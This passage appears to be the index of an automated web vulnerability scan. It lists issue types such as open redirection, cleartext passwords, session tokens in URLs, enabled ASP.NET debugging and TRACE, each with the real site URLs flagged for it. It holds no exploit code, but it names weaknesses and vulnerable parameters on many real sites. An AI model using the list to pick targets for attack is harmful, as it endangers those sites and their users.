7.368. http://www.scholarshipprovider.net/crossdomain.xml

7.369. http://www.scientology.org/crossdomain.xml

7.370. http://www.scott-sports.com/crossdomain.xml

7.371. http://www.tapout.com/crossdomain.xml

7.372. http://www.theworldsbestever.com/crossdomain.xml

7.373. http://www.treknature.com/crossdomain.xml

7.374. http://www.twinspires.com/crossdomain.xml

7.375. http://www.ucc.org/crossdomain.xml

7.376. http://www.usmc-mccs.org/crossdomain.xml

7.377. http://www.uvaldeleadernews.com/crossdomain.xml

7.378. http://www.veenx.com/crossdomain.xml

7.379. http://www.wacotribcars.com/crossdomain.xml

7.380. http://www.weather.com.cn/crossdomain.xml

7.381. http://www.webreserv.com/crossdomain.xml

7.382. http://www.wheel-visualizer.com/crossdomain.xml

7.383. http://www.widescreengamingforum.com/crossdomain.xml

7.384. http://www.wiscnews.com/crossdomain.xml

8. Silverlight cross-domain policy

8.1. http://ad.doubleclick.net/clientaccesspolicy.xml

8.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

8.3. http://pixel.33across.com/clientaccesspolicy.xml

8.4. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

8.5. http://www.arkansasrazorbacks.com/clientaccesspolicy.xml

8.6. http://www.cubuffs.com/clientaccesspolicy.xml

8.7. http://www.cycling.tv/clientaccesspolicy.xml

8.8. http://www.cyclones.com/clientaccesspolicy.xml

8.9. http://www.nbcolympics.com/clientaccesspolicy.xml

8.10. http://www.tv2.no/clientaccesspolicy.xml

8.11. http://www.virginiasports.com/clientaccesspolicy.xml

9. Cleartext submission of password

9.1. http://beam.to/login.asp

9.2. http://www.choicehotels.ca/favicon.ico

9.3. http://www.homedepotmoving.com/favicon.ico

9.4. http://www.idahopower.com/favicon.ico

9.5. http://www.lol-jokes.com/favicon.ico

9.6. http://www.radarsync.com/favicon.ico

9.7. http://www.radarsync.com/favicon.ico

9.8. http://www.restaurantrow.com/favicon.ico

9.9. http://www.se-t.net/favicon.ico

9.10. http://www.superherorelease.com/favicon.ico

10. Session token in URL

10.1. http://www.thehealthplan.com/favicon.ico

10.2. http://www.vc.edu/favicon.ico

11. Password field submitted using GET method

11.1. http://beam.to/login.asp

11.2. http://www.radarsync.com/favicon.ico

12. ASP.NET ViewState without MAC enabled

13. Open redirection

13.1. http://p.brilig.com/contact/bct [REDIR parameter]

13.2. http://server.iad.liveperson.net/hc/15614964/ [imageUrl parameter]

13.3. http://www.researchbynet.com/favicon.ico [name of an arbitrarily supplied request parameter]

14. Cookie scoped to parent domain

14.1. http://api.twitter.com/1/statuses/user_timeline.json

14.2. http://www.bodybyvi.com/favicon.ico

14.3. http://www.cowboom.com/favicon.ico

14.4. http://www.dairylandauto.com/favicon.ico

14.5. http://www.enginebuildermag.com/favicon.ico

14.6. http://www.nobelcom.com/favicon.ico

14.7. http://www.thehealthplan.com/favicon.ico

14.8. http://admeld.adnxs.com/usersync

14.9. http://b.scorecardresearch.com/b

14.10. http://cspix.media6degrees.com/orbserv/hbpix

14.11. http://ds.addthis.com/red/psi/sites/www.truewoman.com/p.json

14.12. http://news.cnet.com/webware/

14.13. http://ping.crowdscience.com/ping.js

14.14. http://pix04.revsci.net/K05540/b3/0/3/1003161/695265068.js

14.15. http://pixel.33across.com/ps/

14.16. http://pixel.quantserve.com/pixel

14.17. http://tags.bluekai.com/site/3327

14.18. http://www.ally.ca/favicon.ico

14.19. http://www.bike.com/favicon.ico

14.20. http://www.bizsiteservice.com/favicon.ico

14.21. http://www.customclassictrucks.com/favicon.ico

14.22. http://www.diamond.com/favicon.ico

14.23. http://www.garden.com/favicon.ico

14.24. http://www.hlj.com/favicon.ico

14.25. http://www.intellichoice.com/favicon.ico

14.26. http://www.isound.com/favicon.ico

14.27. http://www.kidfanatics.com/favicon.ico

14.28. http://www.krcrtv.com/favicon.ico

14.29. http://www.leaderinsurance.com/favicon.ico

14.30. http://www.miami-dadeclerk.com/favicon.ico

14.31. http://www.musclemustangfastfords.com/favicon.ico

14.32. http://www.mustang50magazine.com/favicon.ico

14.33. http://www.pets-seo-services.com/favicon.ico

14.34. http://www.quantumjumping.com/blog/

14.35. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

14.36. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php

14.37. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/layout.php

14.38. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/typography.php

14.39. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png

14.40. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png

14.41. http://www.quiltersclubofamerica.com/favicon.ico

14.42. http://www.quintura.com/favicon.ico

14.43. http://www.reevoo.com/favicon.ico

14.44. http://www.sescoops.com/favicon.ico

14.45. http://www.sportrider.com/favicon.ico

14.46. http://www.st.com/favicon.ico

14.47. http://www.staralliance.com/favicon.ico

14.48. http://www.streetrodderweb.com/favicon.ico

14.49. http://www.thefreeiqtest.org/favicon.ico

14.50. http://www.tutorialblog.org/favicon.ico

14.51. http://www.whitepages.ca/favicon.ico

14.52. http://xcdn.xgraph.net/15530/db/xg.gif

15. Cookie without HttpOnly flag set

15.1. http://beam.to/index.asp

15.2. http://tracking.moon-ray.com/track.php

15.3. http://www.670kboi.com/favicon.ico

15.4. http://www.aacounty.org/favicon.ico

15.5. http://www.alaskaaircruises.com/favicon.ico

15.6. http://www.auristechnology.com/favicon.ico

15.7. http://www.battleformarriage.net/favicon.ico

15.8. http://www.bauerfinancial.com/favicon.ico

15.9. http://www.blackmonchevrolet.com/favicon.ico

15.10. http://www.bodybyvi.com/favicon.ico

15.11. http://www.brainshark.com/favicon.ico

15.12. http://www.bravocompanyusa.com/favicon.ico

15.13. http://www.brightwurks.com/monitor/76246353061db9d2b69ec5f5450fc29ac0efff78/

15.14. http://www.burntorangereport.com/favicon.ico

15.15. http://www.carleasingsecrets.com/favicon.ico

15.16. http://www.ccbg.com/favicon.ico

15.17. http://www.cellphoneaccents.com/favicon.ico

15.18. http://www.cheapbandgear.com/favicon.ico

15.19. http://www.chickensoup.com/favicon.ico

15.20. http://www.childrens.com/favicon.ico

15.21. http://www.cruiseone.com/favicon.ico

15.22. http://www.dairylandauto.com/favicon.ico

15.23. http://www.dedicatedserverdir.com/favicon.ico

15.24. http://www.democratsenators.org/favicon.ico

15.25. http://www.directbuytire.com/favicon.ico

15.26. http://www.disaboom.com/favicon.ico

15.27. http://www.durangoherald.com/favicon.ico

15.28. http://www.egyptair.com/favicon.ico

15.29. http://www.engcen.com/favicon.ico

15.30. http://www.essedive.com/favicon.ico

15.31. http://www.expertrating.com/favicon.ico

15.32. http://www.family.org/favicon.ico

15.33. http://www.fancydress.com/favicon.ico

15.34. http://www.fhainfo.com/favicon.ico

15.35. http://www.henryfields.com/favicon.ico

15.36. http://www.hitsyndication.com/favicon.ico

15.37. http://www.hotelguide.com/favicon.ico

15.38. http://www.hottiearcade.com/favicon.ico

15.39. http://www.hughesnet60.com/favicon.ico

15.40. http://www.huntermtn.com/favicon.ico

15.41. http://www.imagepix.org/favicon.ico

15.42. http://www.imshopping.com/favicon.ico

15.43. http://www.inautix.com/favicon.ico

15.44. http://www.infowarsshop.com/favicon.ico

15.45. http://www.instrumentalsavings.com/favicon.ico

15.46. http://www.jcpenneyoptical.com/favicon.ico

15.47. http://www.kgoam810.com/favicon.ico

15.48. http://www.kontrolfreek.com/favicon.ico

15.49. http://www.linkchina.com/favicon.ico

15.50. http://www.lol-jokes.com/favicon.ico

15.51. http://www.mountainwestbank.com/favicon.ico

15.52. http://www.musi-c-lips.com/favicon.ico

15.53. http://www.mybusinesslisting.com/favicon.ico

15.54. http://www.nobelcom.com/favicon.ico

15.55. http://www.ocinkjet.com/favicon.ico

15.56. http://www.ohioslargestplayground.com/favicon.ico

15.57. http://www.phonesale.com/favicon.ico

15.58. http://www.plantdelights.com/favicon.ico

15.59. http://www.publicus.com/favicon.ico

15.60. http://www.pull-ups.com/favicon.ico

15.61. http://www.rsdynamic.ru/favicon.ico

15.62. http://www.saasdir.com/favicon.ico

15.63. http://www.sdstate.edu/favicon.ico

15.64. http://www.sepw.com/favicon.ico

15.65. http://www.smiletrain.org/favicon.ico

15.66. http://www.stellarone.com/favicon.ico

15.67. http://www.tableclothsfactory.com/favicon.ico

15.68. http://www.teacherjobnet.org/favicon.ico

15.69. http://www.tel3advantage.com/favicon.ico

15.70. http://www.theamericanmonk.com/members/forgot-password

15.71. http://www.thehealthplan.com/favicon.ico

15.72. http://www.thescriptmusic.com/favicon.ico

15.73. http://www.thirdworldpass.com/favicon.ico

15.74. http://www.usairwayscruises.com/favicon.ico

15.75. http://www.vc.edu/favicon.ico

15.76. http://www.waldameer.com/favicon.ico

15.77. http://www.webindia123.com/favicon.ico

15.78. http://www.webreserv.com/favicon.ico

15.79. http://www.westonsupply.com/favicon.ico

15.80. http://www.wholesalefashionsquare.com/favicon.ico

15.81. http://www.wjr.com/favicon.ico

15.82. http://ad.yieldmanager.com/pixel

15.83. http://ad.yieldmanager.com/unpixel

15.84. http://api.twitter.com/1/statuses/user_timeline.json

15.85. http://b.scorecardresearch.com/b

15.86. http://cspix.media6degrees.com/orbserv/hbpix

15.87. http://ds.addthis.com/red/psi/sites/www.truewoman.com/p.json

15.88. http://news.cnet.com/webware/

15.89. http://p.brilig.com/contact/bct

15.90. http://ping.crowdscience.com/ping.js

15.91. http://pix04.revsci.net/K05540/b3/0/3/1003161/695265068.js

15.92. http://pixel.33across.com/ps/

15.93. http://pixel.quantserve.com/pixel

15.94. http://tags.bluekai.com/site/3327

15.95. http://www.975thefanatic.com/favicon.ico

15.96. http://www.accessdubuque.com/favicon.ico

15.97. http://www.acninc.com/favicon.ico

15.98. http://www.agriculture.com/favicon.ico

15.99. http://www.aikenstandard.com/favicon.ico

15.100. http://www.allentate.com/favicon.ico

15.101. http://www.ally.ca/favicon.ico

15.102. http://www.ambiencr.com/favicon.ico

15.103. http://www.ardenb.com/favicon.ico

15.104. http://www.ataglance.com/favicon.ico

15.105. http://www.autorepairlocal.com/favicon.ico

15.106. http://www.autotraderlatino.com/favicon.ico

15.107. http://www.awardhq.com/favicon.ico

15.108. http://www.azdventuresbooks.com/favicon.ico

15.109. http://www.backinthesaddle.com/favicon.ico

15.110. http://www.bandai.com/favicon.ico

15.111. http://www.bhgrealestate.com/favicon.ico

15.112. http://www.bike.com/favicon.ico

15.113. http://www.bluecrossma.com/favicon.ico

15.114. http://www.bystolic.com/favicon.ico

15.115. http://www.calltrackingportal.com/favicon.ico

15.116. http://www.cartoonnetworkasia.com/favicon.ico

15.117. http://www.cbburnet.com/favicon.ico

15.118. http://www.celebsquares.com/favicon.ico

15.119. http://www.chaoticgame.com/favicon.ico

15.120. http://www.chaparral-racing.com/favicon.ico

15.121. http://www.chop.edu/favicon.ico

15.122. http://www.cmphotocenter.com/favicon.ico

15.123. http://www.codigobarras.com/favicon.ico

15.124. http://www.coldwellbankermoves.com/favicon.ico

15.125. http://www.commtrans.org/favicon.ico

15.126. http://www.consumerexpressions.com/favicon.ico

15.127. http://www.cowboom.com/favicon.ico

15.128. http://www.creditacceptance.com/favicon.ico

15.129. http://www.creditimprovers.net/favicon.ico

15.130. http://www.crohnsonline.com/favicon.ico

15.131. http://www.cslplasma.com/favicon.ico

15.132. http://www.customclassictrucks.com/favicon.ico

15.133. http://www.datamark.com/favicon.ico

15.134. http://www.daykick.com/favicon.ico

15.135. http://www.diamond.com/favicon.ico

15.136. http://www.dinnerplates.com/favicon.ico

15.137. http://www.edfinancial.com/favicon.ico

15.138. http://www.efolks.com/favicon.ico

15.139. http://www.embroiderydesigns.com/favicon.ico

15.140. http://www.ferrellgas.com/favicon.ico

15.141. http://www.findaproperty.com/favicon.ico

15.142. http://www.finn.no/favicon.ico

15.143. http://www.fordforum.com/favicon.ico

15.144. http://www.freemdeicalin.com/favicon.ico

15.145. http://www.garden.com/favicon.ico

15.146. http://www.gemvara.com/favicon.ico

15.147. http://www.gmaccessorieszone.com/favicon.ico

15.148. http://www.goestores.com/favicon.ico

15.149. http://www.goinsurancerates.com/favicon.ico

15.150. http://www.greentreepayday.com/favicon.ico

15.151. http://www.guesssms.com/favicon.ico

15.152. http://www.handson.com/favicon.ico

15.153. http://www.healthwealthraffle.org/favicon.ico

15.154. http://www.hear-there.com/favicon.ico

15.155. http://www.helpwithmybank.gov/favicon.ico

15.156. http://www.henryford.com/favicon.ico

15.157. http://www.heralddemocrat.com/favicon.ico

15.158. http://www.hlj.com/favicon.ico

15.159. http://www.homeschoolreviews.com/favicon.ico

15.160. http://www.hondacivicforum.com/favicon.ico

15.161. http://www.horizon-bcbsnj.com/favicon.ico

15.162. http://www.hrmorning.com/favicon.ico

15.163. http://www.iccsafe.org/favicon.ico

15.164. http://www.icing.com/favicon.ico

15.165. http://www.idahopower.com/favicon.ico

15.166. http://www.indiebound.org/favicon.ico

15.167. http://www.intellichoice.com/favicon.ico

15.168. http://www.ip-lookup.net/favicon.ico

15.169. http://www.isound.com/favicon.ico

15.170. http://www.jacksonhewitt.com/favicon.ico

15.171. http://www.jobilephones.com/favicon.ico

15.172. http://www.jpeterman.com/favicon.ico

15.173. http://www.jtvauctions.com/favicon.ico

15.174. http://www.kennedyspacecenter.com/favicon.ico

15.175. http://www.kidfanatics.com/favicon.ico

15.176. http://www.kisw.com/favicon.ico

15.177. http://www.krcrtv.com/favicon.ico

15.178. http://www.ksfcu.org/favicon.ico

15.179. http://www.kvh.com/favicon.ico

15.180. http://www.leaderinsurance.com/favicon.ico

15.181. http://www.learnatest.com/favicon.ico

15.182. http://www.leoncountyfl.gov/favicon.ico

15.183. http://www.lexingtonlaw.com/favicon.ico

15.184. http://www.lifestreetmedia.com/favicon.ico

15.185. http://www.loan.com/favicon.ico

15.186. http://www.longabergerhomesteadstore.com/favicon.ico

15.187. http://www.lrn.com/favicon.ico

15.188. http://www.macmillanmh.com/favicon.ico

15.189. http://www.manhunt.com/favicon.ico

15.190. http://www.marriottvacationclub.com/favicon.ico

15.191. http://www.mctennessee.com/favicon.ico

15.192. http://www.meandmylatina.com/favicon.ico

15.193. http://www.meaningfulbeauty.com/favicon.ico

15.194. http://www.medhunters.com/favicon.ico

15.195. http://www.mem.com/favicon.ico

15.196. http://www.meridianschools.org/favicon.ico

15.197. http://www.miami-dadeclerk.com/favicon.ico

15.198. http://www.mibcn.com/favicon.ico

15.199. http://www.michie.com/favicon.ico

15.200. http://www.microgaming.com/favicon.ico

15.201. http://www.midmichigan.org/favicon.ico

15.202. http://www.misscellania.com/favicon.ico

15.203. http://www.mizunousa.com/favicon.ico

15.204. http://www.moreplatformbeds.com/favicon.ico

15.205. http://www.musclemustangfastfords.com/favicon.ico

15.206. http://www.mustang50magazine.com/favicon.ico

15.207. http://www.mypicturetown.com/favicon.ico

15.208. http://www.mypilotstore.com/favicon.ico

15.209. http://www.myskillstutor.com/favicon.ico

15.210. http://www.nationalexpress.com/favicon.ico

15.211. http://www.netitmail.net/favicon.ico

15.212. http://www.northamericanmotoring.com/favicon.ico

15.213. http://www.nursingcenter.com/favicon.ico

15.214. http://www.nuveen.com/favicon.ico

15.215. http://www.ocfl.net/favicon.ico

15.216. http://www.oecd.org/favicon.ico

15.217. http://www.ohloh.net/favicon.ico

15.218. http://www.opt-intelligence.com/favicon.ico

15.219. http://www.optimahealth.com/favicon.ico

15.220. http://www.oxforddictionaries.com/favicon.ico

15.221. http://www.pahomepage.com/favicon.ico

15.222. http://www.paintball-online.com/favicon.ico

15.223. http://www.paulmccartney.com/favicon.ico

15.224. http://www.pavilionconcerts.com/favicon.ico

15.225. http://www.pets-seo-services.com/favicon.ico

15.226. http://www.photos-naturistes.fr/favicon.ico

15.227. http://www.ppg.com/favicon.ico

15.228. http://www.propertyminder.com/favicon.ico

15.229. http://www.quantumjumping.com/

15.230. http://www.quantumjumping.com/blog/

15.231. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

15.232. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php

15.233. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/layout.php

15.234. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/typography.php

15.235. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png

15.236. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png

15.237. http://www.quantumjumping.com/customers/support/article

15.238. http://www.quantumjumping.com/media/themes/images/a/call.png

15.239. http://www.quiltedparadise.com/favicon.ico

15.240. http://www.quiltersclubofamerica.com/favicon.ico

15.241. http://www.quintura.com/favicon.ico

15.242. http://www.quotit.net/favicon.ico

15.243. http://www.rayovac.com/favicon.ico

15.244. http://www.realhog.com/favicon.ico

15.245. http://www.realitystarscandals.com/favicon.ico

15.246. http://www.reevoo.com/favicon.ico

15.247. http://www.ringling.com/favicon.ico

15.248. http://www.rotary.org/favicon.ico

15.249. http://www.sandicor.com/favicon.ico

15.250. http://www.schneider.com/favicon.ico

15.251. http://www.schoolspecialtyonline.net/favicon.ico

15.252. http://www.sescoops.com/favicon.ico

15.253. http://www.sonyclassics.com/favicon.ico

15.254. http://www.sportrider.com/favicon.ico

15.255. http://www.st.com/favicon.ico

15.256. http://www.standardpacifichomes.com/favicon.ico

15.257. http://www.staralliance.com/favicon.ico

15.258. http://www.statoil.com/favicon.ico

15.259. http://www.streetrodderweb.com/favicon.ico

15.260. http://www.thedjlist.com/favicon.ico

15.261. http://www.thefreeiqtest.org/favicon.ico

15.262. http://www.thehawkeye.com/favicon.ico

15.263. http://www.thehorrordome.com/favicon.ico

15.264. http://www.thepersonalcarecatalog.com/favicon.ico

15.265. http://www.thesportsgearcatalog.com/favicon.ico

15.266. http://www.tickettoread.com/favicon.ico

15.267. http://www.timewarnercableoffers.com/favicon.ico

15.268. http://www.trade-schools.net/favicon.ico

15.269. http://www.trails-end.com/favicon.ico

15.270. http://www.tristatehomepage.com/favicon.ico

15.271. http://www.truewoman.com/

15.272. http://www.truewoman.com/favicon.ic

15.273. http://www.tunewiki.com/favicon.ico

15.274. http://www.tutorialblog.org/favicon.ico

15.275. http://www.uhaulhr.com/favicon.ico

15.276. http://www.vegasview.com/favicon.ico

15.277. http://www.virginhealthmiles.com/favicon.ico

15.278. http://www.vitamin-insight.com/favicon.ico

15.279. http://www.votigo.com/favicon.ico

15.280. http://www.wben.com/favicon.ico

15.281. http://www.weather.com.cn/favicon.ico

15.282. http://www.whatshehastosay.com/favicon.ico

15.283. http://www.whitepages.ca/favicon.ico

15.284. http://www.williams.edu/favicon.ico

15.285. http://www.woman-and-beast.com/favicon.ico

15.286. http://www.wor710.com/favicon.ico

15.287. http://www.worden.com/favicon.ico

15.288. http://www.xteenultra.com/favicon.ico

15.289. http://www.yellowairplane.com/favicon.ico

15.290. http://www.zimbra.com/favicon.ico

15.291. http://xcdn.xgraph.net/15530/db/xg.gif

16. Password field with autocomplete enabled

16.1. http://beam.to/login.asp

16.2. http://www.choicehotels.ca/favicon.ico

16.3. http://www.homedepotmoving.com/favicon.ico

16.4. http://www.lol-jokes.com/favicon.ico

16.5. http://www.nobelcom.com/favicon.ico

16.6. http://www.radarsync.com/favicon.ico

16.7. http://www.radarsync.com/favicon.ico

16.8. http://www.restaurantrow.com/favicon.ico

16.9. http://www.se-t.net/favicon.ico

16.10. http://www.superherorelease.com/favicon.ico

16.11. http://www.thehealthplan.com/favicon.ico

17. Source code disclosure

17.1. http://www.fellowes.com/favicon.ico

17.2. http://www.virginialottery.com/favicon.ico

18. ASP.NET debugging enabled

18.1. http://4qinvite.4q.iperceptions.com/Default.aspx

18.2. http://km6633.keymetric.net/Default.aspx

18.3. http://www.211.org/Default.aspx

18.4. http://www.alzheimersrxtreatment.com/Default.aspx

18.5. http://www.applytracking.com/Default.aspx

18.6. http://www.awsedr.com/Default.aspx

18.7. http://www.bodybyvi.com/Default.aspx

18.8. http://www.booktv.org/Default.aspx

18.9. http://www.breederscup.com/Default.aspx

18.10. http://www.bystolic.com/Default.aspx

18.11. http://www.cern.ch/Default.aspx

18.12. http://www.childrens.com/Default.aspx

18.13. http://www.consumerdemocracy.com/Default.aspx

18.14. http://www.cpllabs.com/Default.aspx

18.15. http://www.creditacceptance.com/Default.aspx

18.16. http://www.crimcheck.com/Default.aspx

18.17. http://www.crohnsonline.com/Default.aspx

18.18. http://www.cupchimerical.com/Default.aspx

18.19. http://www.dutyfreeaffiliates.com/Default.aspx

18.20. http://www.dvdnow.net/Default.aspx

18.21. http://www.e-resume.us/Default.aspx

18.22. http://www.ecndigitaledition.com/Default.aspx

18.23. http://www.elpasoco.com/Default.aspx

18.24. http://www.embark.com/Default.aspx

18.25. http://www.endlessvacation.com/Default.aspx

18.26. http://www.exite-listings.com/Default.aspx

18.27. http://www.fiserv.com/Default.aspx

18.28. http://www.gottashopdeals.com/Default.aspx

18.29. http://www.hondapartshouse.com/Default.aspx

18.30. http://www.housefabric.com/Default.aspx

18.31. http://www.icing.com/Default.aspx

18.32. http://www.ies-co.com/Default.aspx

18.33. http://www.integrativelogic.com/Default.aspx

18.34. http://www.kawasakipartshouse.com/Default.aspx

18.35. http://www.kleinisd.net/Default.aspx

18.36. http://www.lockridgehomes.com/Default.aspx

18.37. http://www.lostmoneylocators.info/Default.aspx

18.38. http://www.michigan-energy.org/Default.aspx

18.39. http://www.moreplatformbeds.com/Default.aspx

18.40. http://www.motion-vr.net/Default.aspx

18.41. http://www.onlyconstructionjobs.com/Default.aspx

18.42. http://www.parsons.com/Default.aspx

18.43. http://www.pickupplease.org/Default.aspx

18.44. http://www.planbonestep.com/Default.aspx

18.45. http://www.pnf.com/Default.aspx

18.46. http://www.pristiq.com/Default.aspx

18.47. http://www.pull-ups.com/Default.aspx

18.48. http://www.qtwebgroup.com/Default.aspx

18.49. http://www.resumesstarthere.com/Default.aspx

18.50. http://www.ritasice.com/Default.aspx

18.51. http://www.roundrockisd.org/Default.aspx

18.52. http://www.roundtablepizza.com/Default.aspx

18.53. http://www.royal.gov.uk/Default.aspx

18.54. http://www.searchfreefonts.com/Default.aspx

18.55. http://www.seedsavers.org/Default.aspx

18.56. http://www.shop-insectlore.com/Default.aspx

18.57. http://www.shoptheseasons.com/Default.aspx

18.58. http://www.snipercountry.com/Default.aspx

18.59. http://www.sonichealthcareusa.com/Default.aspx

18.60. http://www.sonoraquest.com/Default.aspx

18.61. http://www.stoopcreche.com/Default.aspx

18.62. http://www.stoopsalad.com/Default.aspx

18.63. http://www.supermodels.nl/Default.aspx

18.64. http://www.suppress003.com/Default.aspx

18.65. http://www.textcaster.com/Default.aspx

18.66. http://www.thehenryford.org/Default.aspx

18.67. http://www.tmkrms.com/Default.aspx

18.68. http://www.totallymoney.com/Default.aspx

18.69. http://www.trackairy.com/Default.aspx

18.70. http://www.trackzz.com/Default.aspx

18.71. http://www.traitset.com/Default.aspx

18.72. http://www.tri-c.edu/Default.aspx

18.73. http://www.trojancondoms.com/Default.aspx

18.74. http://www.usadiscounters.net/Default.aspx

18.75. http://www.wellsfargoadvisorsinfo.com/Default.aspx

18.76. http://www.yamahapartshouse.com/Default.aspx

18.77. http://www.zig5.com/Default.aspx

19. Referer-dependent response

19.1. http://ad.doubleclick.net/adi/N3671.SD148013N3671SN0/B5403038.2

19.2. http://api.twitter.com/1/statuses/user_timeline.json

19.3. http://www.facebook.com/plugins/like.php

19.4. http://www.quantumjumping.com/

19.5. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

19.6. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php

19.7. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png

19.8. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png

20. Cross-domain POST

20.1. http://www.medicalcareersdirect.com/favicon.ico

20.2. http://www.quantumjumping.com/

20.3. http://www.quantumjumping.com/

20.4. http://www.quantumjumping.com/

20.5. http://www.quantumjumping.com/blog/

20.6. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

20.7. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png

20.8. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png

20.9. http://www.theamericanmonk.com/

20.10. http://www.theamericanmonk.com/

21. Cross-domain Referer leakage

21.1. http://ad.doubleclick.net/adi/N3671.SD148013N3671SN0/B5403038.2

21.2. http://admeld.adnxs.com/usersync

21.3. http://mads.cnet.com/mac-ad

21.4. http://pixel.invitemedia.com/admeld_sync

21.5. http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf

21.6. http://www.facebook.com/plugins/facepile.php

21.7. http://www.facebook.com/plugins/fan.php

21.8. http://www.facebook.com/plugins/like.php

21.9. http://www.facebook.com/plugins/likebox.php

21.10. http://www.facebook.com/plugins/likebox.php

21.11. http://www.quantumjumping.com/

21.12. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

21.13. http://www.quantumjumping.com/contact/view

21.14. http://www.quantumjumping.com/customers/support/article

21.15. http://www.truewoman.com/

21.16. http://www.truewoman.com/

22. Cross-domain script include

22.1. http://ad.doubleclick.net/adi/N3671.SD148013N3671SN0/B5403038.2

22.2. http://beam.to/login.asp

22.3. http://beam.to/start.asp

22.4. http://news.cnet.com/webware/

22.5. http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf

22.6. http://www.aacounty.org/favicon.ico

22.7. http://www.aligngi.com/favicon.ico

22.8. http://www.battleformarriage.net/favicon.ico

22.9. http://www.brightwurks.com/monitor/76246353061db9d2b69ec5f5450fc29ac0efff78/

22.10. http://www.buckmasters.com/favicon.ico

22.11. http://www.capitolhillseattle.com/favicon.ico

22.12. http://www.cellphoneaccents.com/favicon.ico

22.13. http://www.chickensoup.com/favicon.ico

22.14. http://www.cowboom.com/favicon.ico

22.15. http://www.engcen.com/favicon.ico

22.16. http://www.ericksonliving.com/favicon.ico

22.17. http://www.facebook.com/plugins/facepile.php

22.18. http://www.facebook.com/plugins/fan.php

22.19. http://www.facebook.com/plugins/like.php

22.20. http://www.facebook.com/plugins/likebox.php

22.21. http://www.fhainfo.com/favicon.ico

22.22. http://www.fiserv.com/favicon.ico

22.23. http://www.halstead.com/favicon.ico

22.24. http://www.herbalessences.com/favicon.ico

22.25. http://www.heredomination.com/favicon.ico

22.26. http://www.herenextdoor.tv/favicon.ico

22.27. http://www.hereteens.tv/favicon.ico

22.28. http://www.homedepotmoving.com/favicon.ico

22.29. http://www.homeschoolreviews.com/favicon.ico

22.30. http://www.huntermtn.com/favicon.ico

22.31. http://www.inautix.com/favicon.ico

22.32. http://www.kontrolfreek.com/favicon.ico

22.33. http://www.linkchina.com/favicon.ico

22.34. http://www.livewellhd.com/favicon.ico

22.35. http://www.lol-jokes.com/favicon.ico

22.36. http://www.marriottvacationclub.com/favicon.ico

22.37. http://www.medicalcareersdirect.com/favicon.ico

22.38. http://www.moreplatformbeds.com/favicon.ico

22.39. http://www.motorracingnetwork.com/favicon.ico

22.40. http://www.mrclean.com/favicon.ico

22.41. http://www.mybusinesslisting.com/favicon.ico

22.42. http://www.mylovedhair.com/favicon.ico

22.43. http://www.mylovedtwinks.tv/favicon.ico

22.44. http://www.naturalinsight.com/favicon.ico

22.45. http://www.nobelcom.com/favicon.ico

22.46. http://www.plantdelights.com/favicon.ico

22.47. http://www.populartag.com/favicon.ico

22.48. http://www.quantumjumping.com/blog/

22.49. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

22.50. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png

22.51. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png

22.52. http://www.quantumjumping.com/media/themes/images/a/call.png

22.53. http://www.radarsync.com/favicon.ico

22.54. http://www.restaurantrow.com/favicon.ico

22.55. http://www.sandicor.com/favicon.ico

22.56. http://www.sepw.com/favicon.ico

22.57. http://www.shoppinglifestyle.com/favicon.ico

22.58. http://www.shopshop.com/favicon.ico

22.59. http://www.superherorelease.com/favicon.ico

22.60. http://www.theamericanmonk.com/

22.61. http://www.theamericanmonk.com/members/forgot-password

22.62. http://www.thehorrordome.com/favicon.ico

22.63. http://www.truewoman.com/

22.64. http://www.truewoman.com/favicon.ic

22.65. http://www.universalclass.com/favicon.ico

22.66. http://www.uww.edu/

22.67. http://www.uww.edu/favicon.ico

22.68. http://www.vc.edu/favicon.ico

22.69. http://www.webreserv.com/favicon.ico

22.70. http://www.webware.com/c

22.71. http://www.webware.com/crossdomain.xm

22.72. http://www.whitepages.ca/favicon.ico

22.73. http://www.wtok.com/favicon.ico

23. File upload functionality

24. TRACE method is enabled

24.1. http://beam.to/

24.2. http://dw.com.com/

24.3. http://ping.crowdscience.com/

24.4. http://secure-us.imrworldwide.com/

24.5. http://tags.bluekai.com/

24.6. http://tracking.mediabarons.net/

